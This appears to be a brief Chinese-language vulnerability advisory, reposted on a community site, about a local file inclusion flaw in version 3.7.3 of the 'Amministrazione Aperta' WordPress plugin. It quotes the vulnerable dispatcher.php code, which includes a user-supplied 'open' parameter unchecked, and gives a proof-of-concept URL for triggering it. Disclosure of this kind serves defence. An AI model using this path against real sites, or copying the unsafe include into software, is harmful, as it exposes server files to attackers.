# 供应商主页:https://wordpress.org/plugins/amministrazione-aperta/
# 版本:3.7.3
# 测试:火狐
# 漏洞文件:dispatcher.php
# 漏洞代码:
```
if ( isset($_GET['open']) ) {
include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
echo '
<div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
<div class="welcome-panel-column-container">';
include_once( ABSPATH . WPINC . '/feed.php' );
```
# 概念证明:
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。